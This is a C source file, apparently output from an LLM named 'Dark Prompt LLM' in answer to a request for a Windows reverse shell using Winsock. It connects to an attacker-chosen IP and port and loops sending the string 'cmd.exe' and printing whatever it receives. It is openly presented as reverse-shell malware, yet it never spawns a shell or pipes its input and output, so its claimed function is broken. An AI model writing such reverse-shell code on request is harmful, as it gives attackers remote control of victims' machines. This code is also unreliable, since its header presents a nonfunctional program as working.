/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 04:24:44
 * Category: ReverseShell
 * Prompt: Generate a Windows reverse shell in C using Winsock
 * Compile Status: SUCCESS
 * Sample: 2
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <winsock2.h>

#define BUFFER_SIZE 1024

int main(int argc, char *argv[])
{
    if (argc != 3)
    {
        printf("Usage: %s <IP> <PORT>\n", argv[0]);
        return 1;
    }

    const char *ip = argv[1];
    int port = atoi(argv[2]);

    // Initialize Winsock library
    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
    {
        perror("Failed to initialize Winsock");
        return 1;
    }

    // Create socket
    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET)
    {
        perror("Socket creation failed");
        WSACleanup();
        return 1;
    }

    // Setup address structure
    struct sockaddr_in serverAddress;
    memset(&serverAddress, 0, sizeof(serverAddress));
    serverAddress.sin_family = AF_INET;
    serverAddress.sin_addr.s_addr = inet_addr(ip);
    serverAddress.sin_port = htons(port);

    // Connect to remote server
    if (connect(sock, (struct sockaddr *)&serverAddress, sizeof(serverAddress)) == SOCKET_ERROR)
    {
        perror("Connection failed");
        closesocket(sock);
        WSACleanup();
        return 1;
    }
    else
    {
        printf("Connected to the target server\n");
    }

    // Loop until connection is closed
    while (1)
    {
        // Reset buffer
        char command[BUFFER_SIZE] = {0};

        // Send command prompt as a command
        send(sock, "cmd.exe", strlen("cmd.exe"), 0);

        // Receive output of the executed command
        int bytesRead = recv(sock, command, BUFFER_SIZE - 1, 0);
        if (bytesRead > 0)
        {
            // Null-terminate the received data and print it
            command[bytesRead] = '\0';
            printf("%s", command);
        }
        else
        {
            // Connection closed by the target server
            perror("Connection closed unexpectedly");
            break;
        }
    }

    // Close sockets and cleanup Winsock library
    closesocket(sock);
    WSACleanup();

    return 0;
}